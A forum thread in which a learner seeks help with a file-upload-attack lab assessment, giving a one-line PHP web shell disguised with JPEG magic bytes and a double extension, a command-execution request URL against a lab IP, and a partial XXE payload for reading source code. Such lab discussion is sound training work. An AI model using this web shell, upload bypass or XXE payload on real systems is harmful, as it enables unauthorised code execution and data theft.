Skills Assessment - File Upload Attacks

Hello,

I have a problem with solving the Skills Assessment - File Upload Attacks.

Here are the steps I followed:

1. I created a shell.php file with the following code:

<?php system($_REQUEST['cmd']); ?>`

يُرجى استخدام الرمز بحذر. مزيد من المعلومات

content_copy

2. I used a hex editor to convert the file to JPEG format by adding the following bytes:

FF D8 FF EE

3. I changed the file extension to .phar.jpeg.
4. I uploaded the file to a website and it was successfully uploaded.
5. I tried to view the source code of the file by going to the following URL:

view-source:http://94.237.59.12:38629/contact/user_feedback_submissions/test2.phar.jpeg?cmd=cd%20../../../../../;ls

At this point, I do not get any results, and even viewing the source code does not show any results.

Can some one help me?
Thanks

Hey! Looks like you are really close.

I would first try to get the source code in a similar way to the Limited File Uploads section. Once you have the upload.php source code you should be able to see what is happening on the back end. The image file gets modified during the upload process.

Take a look at the source code of upload.php and you will see.
-onthesauce

I try this code
“”"<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE svg <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php

But it didn’t work
There’s another way, please?